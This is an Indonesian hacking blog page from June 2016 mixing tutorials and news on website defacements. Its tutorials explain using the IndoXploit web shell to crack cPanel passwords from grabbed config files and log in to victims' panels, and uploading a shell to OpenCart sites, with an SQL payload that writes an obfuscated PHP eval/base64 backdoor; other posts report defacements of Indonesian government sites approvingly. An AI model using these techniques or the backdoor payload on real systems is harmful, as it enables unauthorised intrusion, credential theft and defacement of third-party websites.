Senin, 13 Juni 2016

KUMPULAN GAMBAR GAMBAR

KUMPULAN GAMBAR GAMBAR :)
KUMPULAN GAMBAR GAMBAR :)
KUMPULAN GAMBAR GAMBAR :)
KUMPULAN GAMBAR GAMBAR :)























































Read more

Minggu, 12 Juni 2016

Tutorial Crack Cpanel dengan IndoXploit Shell

Okee gan kali ini gua akan share Tutorial Crack Cpanel dengan IndoXploit Shell.
karena banyak sekali yang blm ngerti gunain fitur crack cpanel ini.

( kita sudah harus mendapatkan akses shell backdoor dan memiliki "banyak" config grab dalam tutorial kali ini )

Sebelumnya sedikit info bagi yang blm tau, indoxploit shell fitur crack cpanel sudah otomatis grab password. ( ikutin saja petunjuk yang tertera )

kalo blm paham maksud dari petunjuk nya apa, liat ss dibawah ini:

Yap, fitur crack cpanel akan otomatis grab passwordnya jika kita menjalankannya di dalam folder config tersebut.
NB: Tidak harus di folder idx_config di folder config dari shell lain pun bisa
Okeee, jika sudah sesuai dengan petunjuk diatas. Kita lansung menuju fitur "Crack Cpanel" dalam indoxploit shell.
< hanya di indoxploit shell yang dapat melakukan trik ini )

Baca Pentunjuk dalam SS diatas !

Okee jika sudah lansung saja kita klik "Crack" :

Yapp, jika berhasil akan seperti gambar di atas.
tetapi jika tidak ada hasil apa", ya berarti emang gaada cpanelnyaa bukan tools nya yang ga work -_-

Okee sekarang tinggal kita login deh ke cpanel nyaaa, caranyaaa: targetmu.com/cpanel atau targetmu.com:2082 / :2083

okee sekian dulu tutorialll nyaaaaa, semogaa sekarang jadi bisaa yaaa :D

Salam IndoXploit ^^
Thankss to: Azik ( Jembut Loyal ) yang udah kasih live target nyaa.

Shell IndoXploit -> http://blog.indoxploit.or.id/2016/05/indoxploit-shell-first-edition.html
Read more

Sabtu, 11 Juni 2016

Prihatin Kasus Razia Warung Makan, Situs Satpol PP Serang Dijebol Hacker

Pagi kali ini LinuxSec kembali mengabarkan aksi peretasan situs go.id. Setelah kemarin dinia maya ramai membicarakan tindakan Satpol PP Serang yang merazia secara paksa warung ibu ibu 50 tahun yang buka di bulan Ramadhan, hari ini hacker dengan kodenama Shor7cut meretas situs Satpol PP Serang.

Sang hacker tidak merubah frontal halaman situs atau merusaknya. Nah cukup ber-etika saya rasa.
Di judul artikel yang diupdate di situs tersebut pun cukup jelas :
PESAN SEORANG SHOR7CUT - BUKAN HACKED TAPI SUARA HATI
Nah berikut isi pesan yang ditinggalkan oleh shor7cut :
APA YANG SAYA RASAKAN INI BENAR-BENAR SAKIT , DIMANA SEORANG IBU UNTUK MENCARI REZEKY NAFKAH DI BULAN SUCI UNTUK HARI RAYA NANTI MALAH DI HALANGI OLEH SATPOL PP. BILA MEMANG INGIN MERAZIA YA MBOK JANGAN PILIH-PILIH , ITU RESTORAN DAN TOKO-TOKO LAIN KENAPA TIDAK DI TUTUP JUGA ? LOGIKA NYA DIMANA COBA ? SAYA HANYA SESEORANG YANG MENYUARAKAN SUARA HATI SAYA , JUJUR SAYA SENDIRI SANGAT SEDIH , SAAT IBU (PEMILIK WARUNG MAKAN) ITU MENANGGIS BENER" HATI SAYA SAKIT MELIHAT APARAT BERTINDAK TIDAK ADIL. INI BUKAN KEADILAN , INI MERUPAKAN PENIDASAN.  SILAHKAN BAPAK LIHAT VIDIO INI https://youtu.be/9soj-uoDGF8​ DETIK KE 00.04

HANYA LEWAT SITUS INI SAYA MENYUARAKAN CURAHAN HATI SAYA. SAYA HARAP KEDEPANYA TIDAK ADA KEJADIAN SEPERTI INI LAGI. 

SALAM SHOR7CUT
Untuk link nya bisa kalian baca disini :
Mirror :

Sampai berita ini diturunkan masih belum ada perbaikan dari situs yang bersangkutan. Kita tunggu saja kelanjutan dari kasus ini akankah ada respon dari pihak Satpol PP Serang atau tidak.
Sekian berita pagi kali ini, selamat beraktifitas ( jack/lsc )
Read more

Mengambil kata menggunakan preg_match

Abis baca - baca thread lama gw di http://hacker-newbie.org/showthread.php?tid=20672
jadi terharuu..
ternyata udh 2 tahunan maenan exploiter.
sebelumnya gw ucapin byk2 terima kasih kepada bang sohai yang udah ngebimbing gw sejauh ini, bunglon_ijo yang ikut berjuang bersama - sama, rieqyns13 yang udah mau share scannernya.
dan buat lu semua yang udah mau baca tutor ini yang sebenarnya sih ngk terlalu berguna banget...


*Perhatikan kata demi kata yang tak bermakna ini.
sebelumnya mari baca - baca tentang preg_match dulu disini http://php.net/manual/en/function.preg-match.php

tapi disini ane cuma pengen share cara mengambil kata dengan preg_match.
untuk apasih ?

misalnya kita sedang membuat auto upload.
dan ternyata nama filenya menjadi random.
daripada susah - susah ngecek satu per satu secara manual, mending kita ambil aja nama file random itu dan kemudian cek.

mudah saja, misalnya disaat kita selesai upload, outputnya menjadi seperti ini.
"filename":"420331file.php" "message":"Your file has been uploaded"

oke, alurnya seperti ini.
upload -> dapet ouput -> ambil output

yaudah langsung saja.


setelah sudah mendapatkan nama filenya.
baru deh kita cek lagi menggunakan file_get_content atau curl, kemudian pakai preg_match lagi.
tapi karena ini tutor cuma untuk ngambil namanya aja,
yaudah segini aja.
ya mungkin ngk berarti sama sekali.

Tutorial membuat scanner/finder pada website

Correct me if i wrong.

Read more

Situs KPU Kepulauan Selayar Diretas Hacker Malaysia

Kembali lagi dengan LinuxSec mengabarkan kasus peretasan situs pemerintah dalam negeri. Kali ini yang jadi korban adalah situs KPU Kepulauan Selayar. Hacker yang menggunakan nick Harith101 ini berasal dari tim MalaysiaGOV Team.

Menurut mirror zone-h, situs yang berhasil diretas adalah sobdomain 
sidapil.kpu-kepulauanselayarkab.go.id
ppid.kpu-kepulauanselayarkab.go.id
Namun kemungkinan main domain
sidapil.kpu-kepulauanselayarkab.go.id juga diretas. hanya saja tidak bisa dimirrorkan karena sebelumnya telah diretas defacer dengan kodenama ID1OT.
Dari pantauan kami, nampaknya aksi peretasan kali ini hanya random deface tanpa maksud untuk menimbulkan konflik dengan Indonesia. Sehingga tidak perlu teman teman dari Indonesia menamnggapi berlebihan. Hal itu bisa dilihat di catatan mirror mereka dimana mereka juga meretas website website milik malaysia ( .my ) .
Saat berita ini diturunkan, situs KPU Kepulauan Selayar sedang suspend. Kemungkinan maintenance.
Namun kalian bisa melihat mirror nya disini :
Oke sekian berita malam hari ini, terimakasih. ( jack/lsc )
Read more

Jumat, 10 Juni 2016

Upload shell di cms opencart

kali ini ane pengen bagiin tutor upload shell di website cms opencart.
work versi 2 keatas..

cari targetnya bisa pake bruteforce disini
http://blog.indoxploit.or.id/2016/06/deface-dengan-opencart-bruteforce-and.html

langsung aja ke videonya ..
https://www.youtube.com/watch?v=CA6BvEopCEo

a.sql

SELECT '<?php eval (gzinflate(base64_decode("bZBNasNADIX3hd5hGLqIoW4OUHvIpoVCIIV0F4KRbY09MD/C1gRC8d3rcWJooaCNvqenJ4RNH4TswDP6rqgHJV8fHzBB6qmKHhxushXJdcDozVP1eTh+Zd9Ls2sCXWf0/rF/O56klueTZEdVssvz81/hBrNkTVvnparGoYfR2GJbqzxX8uU/x5w7oR3xl6+DDmw6aFrqrgpxv1aHwQmH3Ie2pDCyQN/wlbB00bIhGHibRvIWGFRhPEUWi66NRZFSS73ypbvc5DHWzrAw7QwuYCOWkdT6m+kH"))); ?>' FROM `mouwaffek_table`

thx to spyhackerz.com
Read more

Kamis, 09 Juni 2016

CEO of Facebook Mark Zuckerberg HACKED !!

CEO of Facebook Mark Zuckerberg's  Accounts(Twitter, Pinterest) Hacked! Password was revealed as...

 
The young man who runs the greatest social network and constantly realizes new efforts to establish greater safety to support its billion users security, He neglected to take his security serious and suffered an online breach in his online records.
This guy failed to secure his accounts resulting to BREACH IN SECURITY


Yes you guessed it , I am speaking about The CEO of Facebook  Mark Zuckerberg, who failed to secure his accounts causing his Twitter and Pinterest accounts compromised on Sunday.
These HACKERS group who came from Saudi Arabia, titled OurMine, accepted responsibility for the breach and take a guess on how they succeeded ?

Oh  before we go to how this was Mark Zuckerberg's LinkedIn password "dadada", which he also used for his other online accounts, the group informed us with a tweet.

 
This was possible all thanks to  LinkedIn DATA BREACH








 
Read more

Rabu, 08 Juni 2016

Forum Komunitas BackBox Linux Indonesia Diretas

Pagi ini LinuxSec kembali mengabarkan kasus peretasan situs dalam negeri. Sekitar sejam yang lalu forum komunitas BackBox Linux Indonesia diretas defacer yang mengatasnamakan dirinya " IRCX ". BackBox Indonesia sendiri adalah komunitas pengguna BackBox Linux di Indonesia, dan forum mereka membahas tentang seluk beluk BackBox maupun tentang kegunaan auditing tools pada OS BackBox.

Nah situs bereka yang beralamat di backboxindonesia.or.id baru saja diretas. Defacer mengubah halaman depan situs menjadi background hitam dan tulisan "Stamped by IRCX" . Tidak ada pesan khusus. Sehingga bisa disimpulkan motifnya bukan disebabkan oleh konflik. Namun bisa dipastikan peretasnya orang Indonesia jika menilik dari backsound yang dipasang.
Namun nampaknya admmin dari Forum tersebut sangat tanggap, patut diapresiasi.
Saat ini forum mereka telah kembali normal.

Namun untuk mirror nya bisa dilihat disini :

Update :
Kami sempat mewawancarai sysadmin dari forum yang bersangkutan, dan menurut klarifikasi dari beliau ini bukan aksi peretasan. Namun ttindakan yang dilakukan salahsatu "orang dalam" atau pengurus dari BackBox Indonesia sendiri. Entah apa tujuannya. Mengenai pelaku, sang sysadmin juga sudah mengantongi nama.
Sekian berita pagi ini, selamat menjalankan ibadah puasa. ( jack/lsc )
Read more